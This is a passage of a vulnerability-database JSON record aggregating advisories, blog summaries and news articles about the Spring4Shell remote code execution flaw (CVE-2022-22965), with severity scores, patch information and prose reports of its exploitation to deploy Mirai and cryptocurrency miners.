"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisco": [{"lastseen": "2022-04-29T20:32:50", "description": "On March 31, 2022, the following critical vulnerability in the Spring Framework affecting Spring MVC and Spring WebFlux applications running on JDK 9+ was released:\n\n CVE-2022-22965: Spring Framework RCE via Data Binding on JDK 9+\n\nFor a description of this vulnerability, see VMware Spring Framework Security Vulnerability Report [\"https://tanzu.vmware.com/security/cve-2022-22965\"].\n\nThis advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67 [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67\"]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T23:45:00", "type": "cisco", "title": "Vulnerability in Spring Framework Affecting Cisco Products: March 2022", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-29T16:53:49", "id": "CISCO-SA-JAVA-SPRING-RCE-ZX9GUC67", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "trendmicroblog": [{"lastseen": "2022-04-08T19:28:48", "description": "We discovered active exploitation of a vulnerability in the Spring Framework designated as CVE-2022-22965 that allows malicious actors to download the Mirai botnet malware.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-08T00:00:00", "type": "trendmicroblog", "title": "CVE-2022-22965: Analyzing the Exploitation of Spring4Shell Vulnerability in Weaponizing and Executing the Mirai Botnet Malware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-08T00:00:00", "id": "TRENDMICROBLOG:3BBEDAD3D1AE692D361A31D5E9AE2538", "href": "https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-20T15:36:25", "description": "Recently, we observed attempts to exploit the Spring4Shell vulnerability \u2014 a remote code execution bug, assigned as CVE-2022-22965 \u2014 by malicious actors to deploy cryptocurrency miners.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-20T00:00:00", "type": "trendmicroblog", "title": "Analyzing Attempts to Exploit the Spring4Shell Vulnerability CVE-2022-22965 to Deploy Cryptocurrency Miners", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-20T00:00:00", "id": "TRENDMICROBLOG:59C3D813302731E6DE220FB088280F67", "href": "https://www.trendmicro.com/en_us/research/22/d/spring4shell-exploited-to-deploy-cryptocurrency-miners.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-20T13:29:16", "description": "Recently, we observed the Spring4Shell vulnerability \u2014 a remote code execution bug, assigned as CVE-2022-22965 \u2014 being actively exploited by malicious actors to deploy cryptocurrency miners.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-20T00:00:00", "type": "trendmicroblog", "title": "Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-20T00:00:00", "id": "TRENDMICROBLOG:AFF0912EF635E2446F0D546515038F73", "href": "https://www.trendmicro.com/en_us/research/22/d/spring4shell-exploited-to-deploy-cryptocurrency-miners.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2022-04-08T19:36:04", "description": "UPDATE, APRIL 4, 2022: The Kenna Risk Score for CVE-2022-22965 is currently at maximum 100. This is an exceptionally rare score, of which only 415 out of 184,000 CVEs (or 0.22 percent) have achieved, reflecting the severity and potential effects of this vulnerability. To get a risk score this high... \n \n[[ This is only the beginning! Please visit the blog for the complete entry ]]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-04T10:26:10", "type": "talosblog", "title": "Threat Advisory: Spring4Shell", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-04T10:26:10", "id": "TALOSBLOG:3587BB077717B0512A9D0EFCCBE8770B", "href": "http://blog.talosintelligence.com/2022/03/threat-advisory-spring4shell.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2022-04-08T19:36:00", "description": "A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T23:15:00", "type": "debiancve", "title": "CVE-2022-22965", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-01T23:15:00", "id": "DEBIANCVE:CVE-2022-22965", "href": "https://security-tracker.debian.org/tracker/CVE-2022-22965", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:37:24", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhWlwJSeK-UN5NDOjiAywASbd_85nVwwTSZ4p8416Nk2RzVheiZQZRoJ5feUk8aU4hPOqPbLeoQN6jMQxYXE9wZB1Tz_HjYFDEo_gzhIQz0vrVA0tBuh4Plkfo8LRfEkUpX-to0flLTfnMNB0JmxRQsmswCA5bl1WedSRcYO93Vy5C1Y9lZXBeiRxfE/s728-e100/patch.jpg>)\n\nThe maintainers of Spring Framework have released an emergency patch to address a newly disclosed [remote code execution flaw](<https://thehackernews.com/2022/03/unpatched-java-spring-framework-0-day.html>) that, if successfully exploited, could allow an unauthenticated attacker to take control of a targeted system.\n\nTracked as [CVE-2022-22965](<https://tanzu.vmware.com/security/cve-2022-22965>), the high-severity flaw impacts Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and other older, unsupported versions. Users are recommended to upgrade to versions 5.3.18 or later and 5.2.20 or later.\n\nThe Spring Framework is a Java framework that offers infrastructure support to develop web applications.\n\n\"The vulnerability impacts Spring [MVC](<https://en.wikipedia.org/wiki/Model%E2%80%93view%E2%80%93controller>) [model\u2013view\u2013controller] and Spring WebFlux applications running on [Java Development Kit] 9+,\" Rossen Stoyanchev of Spring.io [said](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) in an advisory published Thursday.\n\n\"The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e., the default, it is not vulnerable to the exploit,\" Stoyanchev added.\n\n\"Exploitation requires an endpoint with DataBinder enabled (e.g., a POST request that decodes data from the request body automatically) and depends heavily on the servlet container for the application,\" Praetorian researchers Anthony Weems and Dallas Kaman [said](<https://www.praetorian.com/blog/spring-core-jdk9-rce/>).\n\nThat said, Spring.io warned that the \"nature of the vulnerability is more general\" and that there could be other ways to weaponize the flaw that has not come to light.\n\nThe patch arrives as a Chinese-speaking researcher briefly published a GitHub commit that contained proof-of-concept (PoC) exploit code for CVE-2022-22965 on March 30, 2022, before it was taken down.\n\nSpring.io, a subsidiary of VMware, noted that it was first alerted to the vulnerability \"late on Tuesday evening, close to midnight, GMT time by codeplutos, meizjm3i of AntGroup FG Security Lab.\" It also credited cybersecurity firm Praetorian for reporting the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T15:35:00", "type": "thn", "title": "Security Patch Releases for Critical Zero-Day Bug in Java Spring Framework", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T03:15:06", "id": "THN:7A3DFDA680FEA7FB77640D29F9D3E3E2", "href": "https://thehackernews.com/2022/03/security-patch-releases-for-critical.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:27", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiQLJsA4VqLU_2Ko5mgCsWlJMIvwJT2aoEwLoOKMLxy58CeNKOGs27Dp9UfziDFWzjBdovG_PWvQNtsSMBZo4TPOTCJEfeBa3iT0K6lhdquC_6NlvR1qkZoGlYQfXgCwTDOk-gGVKSHY_iHWYSwCWPKdbGNIFo7sFQcS8GrfaN9XAP9-OcC3-Q64mup/s728-e100/crypto-mining.jpg>)\n\nLemonDuck, a cross-platform cryptocurrency mining botnet, is targeting Docker to mine cryptocurrency on Linux systems as part of an active malware campaign.\n\n\"It runs an anonymous mining operation by the use of proxy pools, which hide the wallet addresses,\" CrowdStrike [said](<https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/>) in a new report. \"It evades detection by targeting Alibaba Cloud's monitoring service and disabling it.\"\n\nKnown to strike both Windows and Linux environments, LemonDuck is primarily engineered for abusing the system resources to mine Monero. But it's also capable of credential theft, lateral movement, and facilitating the deployment of additional payloads for follow-on activities.\n\n\"It uses a wide range of spreading mechanisms \u2014 phishing emails, exploits, USB devices, brute force, among others \u2014 and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns,\" Microsoft [detailed](<https://thehackernews.com/2021/07/microsoft-warns-of-lemonduck-malware.html>) in a technical write-up of the malware last July. \n\nIn early 2021, attack chains involving LemonDuck [leveraged](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) the then newly patched [Exchange Server vulnerabilities](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>) to gain access to outdated Windows machines, before downloading backdoors and information stealers, including Ramnit.\n\nThe latest campaign spotted by CrowdStrike takes advantage of exposed Docker APIs as an initial access vector, using it to run a rogue container to retrieve a Bash shell script file that's disguised as a harmless PNG image file from a remote server.\n\nAn analysis of historical data shows that similar image file droppers hosted on LemonDuck-associated domains have been put to use by the threat actor since at least January 2021, the cybersecurity firm noted.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgnepqytFGyLXQ-se6LSQbD8dcaKtmXDuAVuPCd_sPXu7Yx48Lz-oOWavHaLTuVfJs51onI2dx2vm_sbhMbEMBmlmxd2VKQlwVynElKDwR3CU4NPjtYhIE7eAKStI5X-t0n_wmahvr1LKomSVvdEsfaiHUYHz1dDW2dYzUEwbyQLlaW27yosLkpLVHy/s728-e100/docker.jpg>)\n\nThe dropper files are key to launching the attack, with the shell script downloading the actual payload that then kills competing processes, disables Alibaba Cloud's monitoring services, and finally downloads and runs the XMRig coin miner.\n\nWith [compromised cloud instances](<https://thehackernews.com/2021/11/hackers-using-compromised-google-cloud.html>) becoming a hotbed for illicit cryptocurrency mining activities, the findings underscore the need to secure containers from potential risks throughout the software supply chain.\n\n### TeamTNT targets AWS, Alibaba Cloud\n\nThe disclosure comes as Cisco Talos exposed the toolset of a cybercrime group named TeamTNT, which has a history of targeting cloud infrastructure for cryptojacking and placing backdoors.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj6dfAwirfE8zK8lIvO9C83J02rpPa4oqENbHyfJRLj36q8mg1qdWQazJucqou991fXw6Xt6GyN-cLDDFrr2CAxKN7qIC4HXZI2r7XKpG_vwbA5MggiCzUCWAs0-mSkJ6kbK3Dz00BVEgGS5JmJphX1B9Igew8fq9dCPv_WDqWCupPxoaYwe4nSYro3/s728-e100/code.jpg>)\n\nThe malware payloads, which are said to have been modified in response to [previous public disclosures](<https://www.trendmicro.com/en_us/research/21/c/teamtnt-continues-attack-on-the-cloud--targets-aws-credentials.html>), are primarily designed to target Amazon Web Services (AWS) while simultaneously focused on cryptocurrency mining, persistence, lateral movement, and disabling cloud security solutions.\n\n\"Cybercriminals who are outed by security researchers must update their tools in order to continue to operate successfully,\" Talos researcher Darin Smith [said](<https://blog.talosintelligence.com/2022/04/teamtnt-targeting-aws-alibaba.html>).\n\n\"The tools used by TeamTNT demonstrate that cybercriminals are increasingly comfortable attacking modern environments such as Docker, Kubernetes, and public cloud providers, which have traditionally been avoided by other cybercriminals who have instead focused on on-premise or mobile environments.\"\n\n### Spring4Shell exploited for cryptocurrency mining\n\nThat's not all. In yet another instance of how threat actors quickly co-opt newly disclosed flaws into their attacks, the critical remote code execution bug in Spring Framework ([CVE-2022-22965](<https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html>)) has been weaponized to deploy cryptocurrency miners.\n\nThe exploitation attempts make use of a custom web shell to deploy the cryptocurrency miners, but not before turning off the firewall and terminating other virtual currency miner processes.\n\n\"These cryptocurrency miners have the potential to affect a large number of users, especially since Spring is the most widely used framework for developing enterprise-level applications in Java,\" Trend Micro researchers Nitesh Surana and Ashish Verma [said](<https://www.trendmicro.com/en_us/research/22/d/spring4shell-exploited-to-deploy-cryptocurrency-miners.html>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-22T09:30:00", "type": "thn", "title": "Watch Out! Cryptocurrency Miners Targeting Dockers, AWS and Alibaba Cloud", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-22T09:30:49", "id": "THN:8FDA592D55831C1C4E3583B81FABA962", "href": "https://thehackernews.com/2022/04/watch-out-cryptocurrency-miners.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:29", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh12dL7ICi8BzkoVRiKbx2OSWekbI0DsSUJej7yknw_QwT_Qbim9vL4F3zob65jCAK8C1Fh19m0emVWE1LHS-mgk8ALDqg0RZd4nQS4V4rH-wQIaAWve3Ddp3SlOgAmzJBcDiQWx3p3Oy0IEqk0-om-yo0-rV9sacfjd9WsCE8ZPI73d01olPBIkL0K/s728-e100/mirai-okiru-iot-botnet-elf-malware-arc-cpu.png>)\n\nThe recently disclosed critical **Spring4Shell** vulnerability is being actively exploited by threat actors to execute the [Mirai](<https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai>) [botnet malware](<https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/>), particularly in the Singapore region since the start of April 2022.\n\n\"The exploitation allows threat actors to download the Mirai sample to the '/tmp' folder and execute them after permission change using ['chmod](<https://en.wikipedia.org/wiki/Chmod>),'\" Trend Micro researchers Deep Patel, Nitesh Surana, Ashish Verma [said](<https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html>) in a report published Friday.\n\nTracked as [CVE-2022-22965](<https://thehackernews.com/2022/03/security-patch-releases-for-critical.html>) (CVSS score: 9.8), the vulnerability could allow malicious actors to achieve remote code execution in Spring Core applications under non-default circumstances, granting the attackers full control over the compromised devices.\n\nThe development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) earlier this week [added](<https://thehackernews.com/2022/04/cisa-warns-of-active-exploitation-of.html>) the Spring4Shell vulnerability to its Known Exploited Vulnerabilities Catalog based on \"evidence of active exploitation.\"\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEio8WhSw-QIpeEhZEzpG6ZbweArmP6HTh3N5WuvSTrKDdlQum-IR2xuoGvt9gCWRpkFXtwmc0B-pNR-Mt9w4ut0cD27-gGJDWOM1tOFjlH4c042z40m1FiRMhem_BfeLbF7J7EvdXNoby9MGEvNKe8entBcSRhB4LSooVFeg_PnFi6w9k6cX4udeOvo/s728-e100/exploit.jpg>)\n\nThis is far from the first time the botnet operators have quickly moved to add newly publicized flaws to their exploit toolset. In December 2021, multiple botnets including Mirai and Kinsing were [uncovered](<https://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts>) leveraging the [Log4Shell vulnerability](<https://thehackernews.com/2022/04/chinese-hackers-target-vmware-horizon.html>) to breach susceptible servers on the internet. \n\n[Mirai](<https://en.wikipedia.org/wiki/Mirai_\\(malware\\)>), meaning \"future\" in Japanese, is the name given to a [Linux malware](<https://www.cloudflare.com/learning/ddos/glossary/mirai-botnet/>) that has continued to target connected smart home devices such as IP cameras and routers and link them together into a network of infected devices known as a botnet.\n\nThe IoT botnet, using the herd of hijacked hardware, can be then used to commit further attacks, including large-scale phishing attacks, cryptocurrency mining, click fraud, and distributed denial-of-service (DDoS) attacks.\n\nTo make matters worse, the leak of Mirai's source code in [October 2016](<https://thehackernews.com/2016/10/mirai-source-code-iot-botnet.html>) has given birth to [numerous variants](<https://thehackernews.com/2020/06/ddos-botnet-hacker-jailed.html>) such as Okiru, Satori, Masuta, and [Reaper](<https://www.radware.com/security/ddos-threats-attacks/threat-advisories-attack-reports/reaper-botnet/>), making it an ever-mutating threat.\n\n\"The [Mirai] code is so influential that even some of the malware offshoots are starting to have their own code versions released and co-opted by other cybercriminals,\" Intel 471 researchers [said](<https://intel471.com/blog/malware-source-code-leak-history>) last month, pointing out the upload of the [BotenaGo botnet's](<https://cybersecurity.att.com/blogs/labs-research/botenago-strike-again-malware-source-code-uploaded-to-github>) source code on GitHub in January 2022.\n\nEarlier this January, cybersecurity firm CrowdStrike noted that malware hitting Linux systems increased by 35% in 2021 compared to 2020, with [XOR DDoS](<https://thehackernews.com/2020/06/cryptocurrency-docker-image.html>), Mirai, and [Mozi](<https://thehackernews.com/2021/09/chinese-authorities-arrest-hackers.html>) malware families accounting for more than 22% of Linux-targeted threats observed in the year.\n\n\"The primary purpose of these malware families is to compromise vulnerable internet-connected devices, amass them into botnets, and use them to perform distributed denial-of-service (DDoS) attacks,\" the researchers [said](<https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-09T05:18:00", "type": "thn", "title": "Hackers Exploiting Spring4Shell Vulnerability to Deploy Mirai Botnet Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22965"], "modified": "2022-04-14T04:20:56", "id": "THN:ECDABD8FB1E94F5D8AFD13E4C1CB5840", "href": "https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:30", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiJLT66MmOp4XJQPaUVpNaPQ0AnBgbGEXqPHf8RVQPLovMSaeGXsWZRR6c7Dp5sJac6GET2Cl880ZwgRnDP0aQL9WZnlajwakBLIjgTzBT4iQZncAmfkSp_2bc-ToWhkNP9-bwbdNzb417p6KbV4gUpkLSMrmoWNQWhcY6jiJ0JULROrg5f1tjTNJwv/s728-e100/cisa.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added the recently disclosed remote code execution (RCE) vulnerability affecting the Spring Framework, to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) based on \"evidence of active exploitation.\"\n\nThe critical severity flaw, assigned the identifier [CVE-2022-22965](<https://thehackernews.com/2022/03/security-patch-releases-for-critical.html>) (CVSS score: 9.8) and dubbed \"Spring4Shell\", impacts Spring model\u2013view\u2013controller (MVC) and Spring WebFlux applications running on Java Development Kit 9 and later.\n\n\"Exploitation requires an endpoint with DataBinder enabled (e.g., a POST request that decodes data from the request body automatically) and depends heavily on the servlet container for the application,\" Praetorian researchers Anthony Weems and Dallas Kaman noted last week.\n\nAlthough exact details of in-the-wild abuse remain unclear, information security company SecurityScorecard [said](<https://securityscorecard.com/blog/spring4shell-12-year-old-vulnerability-springs-back-to-life>) \"active scanning for this vulnerability has been observed coming from the usual suspects like Russian and Chinese IP space.\"\n\nSimilar scanning activities have been spotted by [Akamai](<https://www.akamai.com/blog/security/spring-core-spring4shell-zero-day>) and Palo Alto Networks' [Unit42](<https://unit42.paloaltonetworks.com/cve-2022-22965-springshell/>), with the attempts leading to the deployment of a web shell for backdoor access and to execute arbitrary commands on the server with the goal of delivering other malware or spreading within the target network.\n\n\"During the first four days after the vulnerability outbreak, 16% of the organizations worldwide were impacted by exploitation attempts,\" Check Point Research 